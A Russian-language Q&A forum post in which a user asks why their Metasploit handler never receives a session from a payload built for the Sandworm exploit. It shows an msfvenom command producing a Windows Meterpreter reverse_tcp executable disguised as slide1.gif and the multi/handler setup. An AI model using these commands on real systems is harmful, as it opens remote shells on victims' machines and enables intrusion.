Полезная нагрузка для эксплойта песчаного червя - PullRequest
0 голосов
/ 25 марта 2020

Я пытаюсь создать полезную нагрузку для эксплойта sandworm, используя msfvenom.

Я использую файл python, который содержит код для объектов, и код в основном не изменился, за исключением меня, заменяющего Строка msfpayload и замена ее на msfvenom. Строка в настоящее время:

cmd = 'msfvenom windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f exe > %s' % (ip, port, file)

Полезная нагрузка хранится в файле с именем slide1.gif (надеюсь), и я создаю обработчик, используя команды:

use exploit/multi/handler

set LHOST <Same host that is sent as an argument during payload creation>

set LPORT <Same port that is sent as an argument during payload creation>

После выполнения соответствующего файла также должна быть выполнена полезная нагрузка, и обработчик должен быть в состоянии ее перехватить, но полезная нагрузка никогда не перехватывается обработчиком. Что-то я не так делаю?

Python код был получен из: https://www.exploit-db.com/exploits/35055

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...